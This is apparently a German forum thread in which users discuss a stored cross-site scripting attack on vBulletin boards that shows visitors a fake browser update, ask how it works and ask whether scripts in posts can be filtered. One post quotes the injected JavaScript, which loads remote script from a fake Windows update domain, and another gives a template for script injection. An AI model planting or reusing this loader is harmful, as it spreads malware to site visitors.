joa und alles durch den scanner beim hochladen ?? glaube das würde viel speicher und zeit dauern .....
Sagt mal, kann mir jemand eine "von Hand" Anleitung zur Installation dieses Trojaners
geben ? Mein Linux will und will den einfach nicht automatisch starten ^^
Ich glaube, all die Apfel-User da draussen können von dem Problem auch dasselbe Lied
singen ..
All die nette Software, die sich automatisch aufdrängen will, und ich kann sie einfach
nicht nutzen :-(
--
In a world without walls and fences, who needs Windows and Gates ??
Meine private Webseite: http://www.db1jat.org
Bei Äpfeln und Pinguinen kommt halt nicht alles durchs "Fenster" geflogen ;)
kann mir jmd als zufriedener windows nutzer erklären wie diese art angriff überhaupt funktioniert und keine sicherheitsmaßnahmen greifen?
Schwachstelle in der Forensoftware suchen, finden &nutzen-->javascript code einfüge-->Voila der Browser meldet Update
ah und wie wird der eingefügt?
was in den beitrag geschrieben oder während der beitrag an den server gesendet wird?
ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein
benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hierCode:{script} Hier Schadcode nach wahl {/script}
EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht
achso...
ich dachte auch das die software sowas filtert....
naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?
Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:
XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'>"+"script>")
achso:)
kann man das nicht filtern? also das nur moderatoren scripte nutzen dürfen?
Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)